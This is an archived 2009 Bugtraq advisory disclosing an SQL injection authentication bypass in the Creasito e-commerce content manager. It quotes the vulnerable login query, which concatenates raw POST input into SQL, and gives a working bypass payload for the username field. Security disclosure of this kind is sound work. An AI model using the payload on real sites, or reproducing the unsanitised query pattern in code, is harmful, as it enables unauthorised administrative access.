Bugtraqmailing list archives
Creasito e-commerce content manager Authentication Bypass
From: "Salvatore \"drosophila\" Fresta" <drosophilaxxx () gmail com>
Date: Mon, 20 Apr 2009 17:08:20 +0200
******* Salvatore "drosophila" Fresta *******[+] Application: creasito e-commerce content manager[+] Version: 1.3.16[+] Website:http://creasito.bloghosteria.com[+] Bugs: [A] Authentication Bypass[+] Exploitation: Remote[+] Date: 20 Apr 2009[+] Discovered by: Salvatore "drosophila" Fresta[+] Author: Salvatore "drosophila" Fresta[+] Contact: e-mail: drosophilaxxx () gmail com*************************************************[+] Menu1) Bugs2) Code3) Fix*************************************************[+] BugsThis cms is entirely vulnerable to SQL Injection.I decided to post authentication bypass securityflaw only.- [A] Authentication Bypass[-] Risk: medium[-] Requisites: magic_quotes_gpc = off[-] File affected: admin/checkuser.php, checkuser.phpSQL Injection bug allows a guest to bypass theauthentication system. The following is thevulnerable code:...$username = $_POST['username'];...$sql = mysql_query("SELECT * FROM amministratore WHEREusername='$username' AND password='$password' AND activated='1'");...*************************************************[+] Code- [A] Authentication BypassUsername: -1' OR '1'='1'#Password: foo*************************************************[+] FixNo fix.*************************************************-- Salvatore "drosophila" FrestaCWNP444351
Attachment:Creasito e-commerce content manager Authentication Bypass-20042009.txt
Description:
Current thread:
- Creasito e-commerce content manager Authentication BypassSalvatore "drosophila" Fresta (Apr 20)